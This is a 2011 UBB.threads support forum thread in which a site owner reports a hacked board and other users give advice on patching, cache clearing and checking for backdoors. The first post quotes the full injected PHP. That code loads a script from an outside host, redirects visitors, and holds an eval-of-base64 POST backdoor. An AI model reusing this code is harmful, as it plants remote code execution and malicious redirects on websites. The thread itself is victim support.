Previous Thread
Next Thread
Print Thread
Hop To
Board Hacked #246683 11/09/2011 2:31 PM
Joined: Jul 2009
Posts: 18
tranmkp Offline OP
stranger
OP Offline
stranger
Joined: Jul 2009
Posts: 18
Some Russian crap site re-director somehow comprised all the php on our web site. No idea how - anyway I can see his code in every php header of page -

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }


I can see it in these two pages ultimatebb.php ---ubbaccel_test.php any other php pages in other directories?

Will I void my support if I remove it all?

Next - is how did they do it?



Re: Board Hacked [Re: tranmkp] #246684 11/09/2011 2:34 PM
Joined: Jun 2006
Posts: 1,344
gliderdad Offline
veteran
Offline
veteran
Joined: Jun 2006
Posts: 1,344
What version of ubb are you running?

Re: Board Hacked [Re: tranmkp] #246685 11/09/2011 2:37 PM
Joined: Jul 2005
Posts: 45
mig Offline
newbie
Offline
newbie
Joined: Jul 2005
Posts: 45

Re: Board Hacked [Re: gliderdad] #246781 11/13/2011 12:04 PM
Joined: Jul 2009
Posts: 18
tranmkp Offline OP
stranger
OP Offline
stranger
Joined: Jul 2009
Posts: 18
7.5.4.2

Re: Board Hacked [Re: tranmkp] #246782 11/13/2011 12:31 PM
Joined: Jul 2009
Posts: 18
tranmkp Offline OP
stranger
OP Offline
stranger
Joined: Jul 2009
Posts: 18
so I went and downloaded the patch - #12 ( I have 7.5.4.2)

Uploaded and overwrote the directories. After flushing cache - How do I verify the patch is functional?

Re: Board Hacked [Re: tranmkp] #246783 11/13/2011 12:32 PM
Joined: Jan 2008
Posts: 514
Dunny Offline
addict
Offline
addict
Joined: Jan 2008
Posts: 514
should say something like this at the bottom of the board...

Powered by UBB.threads™ 7.5.6p2

Re: Board Hacked [Re: Dunny] #246790 11/13/2011 2:27 PM
Joined: Jul 2009
Posts: 18
tranmkp Offline OP
stranger
OP Offline
stranger
Joined: Jul 2009
Posts: 18
nope - nothing yet

Re: Board Hacked [Re: tranmkp] #246794 11/13/2011 3:10 PM
Joined: Jun 2006
Posts: 15,852
Gizmo Offline
UBB.threads Developer
Offline
UBB.threads Developer
Joined: Jun 2006
Posts: 15,852
Well, just installing a patch isn't going to fix the problems you have now; it's likely that an attacker has installed a backdoor to allow them to come in and make a mess whenever they want (like the hackers did on most of the forums which where hit a month ago)... You should consider hiring someone to dig through your webspace to check for any of them.


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Need to Upgrade?
Forums: A Gardeners Forum Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: Board Hacked [Re: tranmkp] #246795 11/13/2011 3:12 PM
Joined: Jun 2006
Posts: 15,852
Gizmo Offline
UBB.threads Developer
Offline
UBB.threads Developer
Joined: Jun 2006
Posts: 15,852
Originally Posted by tranmkp
nope - nothing yet
Well, if it doesn't show that it's been patched, and you've cleared the cache, you should try re-applying the patch and clearing the cache again... If that doesn't work, try deleting everything from /cache and /templates/compiled and then clear the cache again (or consider paying someone to upgrade you to the latest build; plenty of us offer these services)


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Need to Upgrade?
Forums: A Gardeners Forum Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: Board Hacked [Re: tranmkp] #246802 11/13/2011 4:52 PM
Joined: Jan 2008
Posts: 514
Dunny Offline
addict
Offline
addict
Joined: Jan 2008
Posts: 514
I had an issue with file permissions when I installed the files... after I went back and fixed those permissions everything came up correctly.

Dunny

Re: Board Hacked [Re: tranmkp] #246804 11/13/2011 4:55 PM
Joined: Dec 2003
Posts: 5,998
Ruben Offline
Offline
Joined: Dec 2003
Posts: 5,998
Originally Posted by tranmkp
so I went and downloaded the patch - #12 ( I have 7.5.4.2)

Uploaded and overwrote the directories. After flushing cache - How do I verify the patch is functional?

Noticing you have v 7.5.4.2 what is the reference to #12.

Okay I get the #12 now.
If you did not upgrade your version you should have used #10
the #12 patch is for 7.5.6 you need the one for your version.

Last edited by Ruben; 11/13/2011 5:00 PM. Reason: Added Comment

Blue Man Group
There is no such thing as stupid questions. Just stupid answers
Re: Board Hacked [Re: tranmkp] #246806 11/13/2011 5:06 PM
Joined: Dec 2003
Posts: 5,998
Ruben Offline
Offline
Joined: Dec 2003
Posts: 5,998
Also I am amazed you are lucky enough to not have hosed your board using the wrong patch.


Blue Man Group
There is no such thing as stupid questions. Just stupid answers
Re: Board Hacked [Re: Ruben] #246821 11/13/2011 7:48 PM
Joined: Jun 2006
Posts: 15,852
Gizmo Offline
UBB.threads Developer
Offline
UBB.threads Developer
Joined: Jun 2006
Posts: 15,852
Originally Posted by Ruben
Also I am amazed you are lucky enough to not have hosed your board using the wrong patch.
Agreed... If this type of thing isn't something you're comfortable with, I'd really hire out to do it as you can make a larger mess in general...

I mean, I upgrade forums for a modest fee, but having to go in and figure out what is hosed would end up taking longer and thus cost more...


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Need to Upgrade?
Forums: A Gardeners Forum Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: Board Hacked [Re: tranmkp] #246854 11/14/2011 6:36 PM
Joined: Jun 2006
Posts: 81
Mike L Offline
member
Offline
member
Joined: Jun 2006
Posts: 81
Computer code is VERY unforgiving. Along with Ruben and Gizmo, I am amazed that your board worked at all.


Gizmo is being nice while laying it out like it is.

Think about taking your car to a good mechanic when you first have a problem.

It will cost you a little, but you will feel comfortable in the knowledge that you got good service for a fair price.

Now, let's say that you tried to fix your car yourself and really made a mess of things.

To start... Many shops will send you packing, not wanting to bother with a botched job. The shops that will accept the work are going to charge you for their trouble. Some will rake you over for it.

You can bet that Gizmo would want something extra up front for what could be an open ended issue. The risk for him is that he spends several hours to come to the conclusion that it is a lost cause. That is a customer support nightmare and not a fun phone call to make.









Forum Search
ShoutChat Box
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
Mobile app?
by Baldeagle - 12/06/2019 9:32 PM
How do you change Text Line spacing?
by jorb - 11/23/2019 12:14 AM
What happened to FAQ or Forum Help
by Ruben - 11/20/2019 11:58 AM
Search feature encountering an Error message
by jorb - 11/20/2019 12:06 AM
UBB Dev
by JAISP - 11/03/2019 11:01 AM
Who's Online Now
2 registered members (isaac, JAISP), 65 guests, and 401 spiders.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Amusing Terain Scenics
Amusing Terain Scenics
by isaac, August 19
Sky places
Sky places
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 7.7.4
(Snapshot build 20191023)